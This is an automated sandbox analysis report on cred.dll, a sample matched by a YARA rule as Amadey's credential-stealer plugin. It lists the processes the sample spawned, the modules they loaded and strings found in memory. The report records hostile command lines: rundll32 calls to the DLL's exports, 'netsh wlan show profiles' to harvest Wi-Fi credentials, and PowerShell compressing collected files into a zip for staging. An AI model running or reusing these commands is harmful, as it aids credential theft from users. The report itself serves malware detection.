    Source: powershell.exe, 0000000B.00000002.1506648426.000002A263A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1622167122.000002A2721D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1566797519.0000018290073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.00000182818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019032286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A262388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A262161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.00000190309B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A262388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 0000000C.00000002.1606498294.00000182F79EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
    Source: powershell.exe, 0000000C.00000002.1607601534.00000182F7A10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1608704623.00000182F7A48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1737664936.0000019048E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A262161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.00000190309B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000014.00000002.1570212406.0000019031ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019031CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A263731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018281625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019031FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
    Source: powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A263A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1622167122.000002A2721D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1566797519.0000018290073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.00000182818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019032286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: cred.dll, type: SAMPLEMatched rule: Finds Amadey\'s stealer plugin based on characteristic strings Author: Sekoia.io
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFB4B06D3C011_2_00007FFB4B06D3C0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFB4B06D15911_2_00007FFB4B06D159
    Source: cred.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
    Source: cred.dll, type: SAMPLEMatched rule: loader_amadey_stealer_plugin author = Sekoia.io, description = Finds Amadey\'s stealer plugin based on characteristic strings, creation_date = 2023-05-16, classification = TLP:CLEAR, version = 1.0, id = 50154e39-98b3-40e5-8986-18bbb7b15647
    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winDLL@32/22@0/1
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3232:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\_Files_\Jump to behavior
    Source: cred.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred.dll,Main
    Source: rundll32.exe, 00000004.00000002.1680276783.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1680276783.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1661438343.000000000315A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1748097265.000000000323A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: cred.dllReversingLabs: Detection: 76%
    Source: cred.dllVirustotal: Detection: 81%
    Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\cred.dll"
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred.dll",#1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred.dll,Main
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",#1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred.dll,Save
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",Main
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",Save
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred.dll",#1Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred.dll,MainJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred.dll,SaveJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",MainJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",SaveJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",#1Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
